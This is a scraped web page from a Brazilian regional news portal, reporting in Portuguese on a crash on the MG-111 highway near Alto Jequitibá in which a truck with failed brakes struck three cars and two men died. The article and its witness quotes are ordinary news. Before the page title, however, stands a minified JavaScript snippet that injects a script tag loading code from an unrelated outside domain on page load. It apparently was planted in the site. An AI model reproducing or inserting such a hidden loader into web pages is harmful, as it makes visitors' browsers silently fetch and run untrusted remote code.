;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Duas pessoas morrem em acidente na MG-111. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Duas pessoas morrem em acidente na MG-111.

mauroALTO JEQUITIBÁ (MG) – Duas pessoas morreram num acidente no km 117 da MG-111 envolvendo um caminhão e três veículos. A colisão foi na noite desta quinta-feira, 08/08, na serra próxima ao mirante do Belvedere, no distrito de Padre Júlio Maria (Vargem Grande), em Alto Jequitibá.
Luiz Carlos Zefereino, 54 anos, descia a rodovia dirigindo um caminhão Mercedes Benz, no sentido Caparaó/Alto Jequitibá, quando o veículo apresentou problema no sistema de freio. Ele invadiu a contramão e passou por cima de um Astra. Em seguida, sem conseguir parar, atingiu um Gol e um Saveiro, que estavam descendo a serra, à frente dele.carangola
O motorista do Astra, José Mauro Graça Corrêa, 44 anos, de Carangola, morreu preso às ferragens. O passageiro Valter Ventura Peron, 59 anos, foi socorrido para a Casa de Caridade de Carangola, com ferimentos graves, e faleceu na madrugada desta sexta-feira.
Divino Lino de Souza, 43 anos, viajava com o irmão no veículo Gol. Os dois saíram ilesos do acidente. “Eu só lembro quando ouvi o barulho do caminhão atingindo o Astra e, em seguida, ele já foi empurrando meu carro contra o barranco”.
Arcendino Sindra, 52 anos, dirigia a Saveiro. O caminhão parou em cima da carroceria do utilitário dele. “Eu ouvi o barulho como se fossem tiros e, quando percebi, fui atingido. Não aconteceu nada comigo. Sempre tive muita fé em Deus e sei que foi Ele que me protegeu”, contou aliviado.
A ocorrência foi registrada pela Polícia Militar Rodoviária. Equipes do Corpo de Bombeiros de Manhuaçu e da Polícia Militar de Alto Jequitibá auxiliaram no atendimento da ocorrência.


Informação: Jailton Pereira – portalcaparao

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.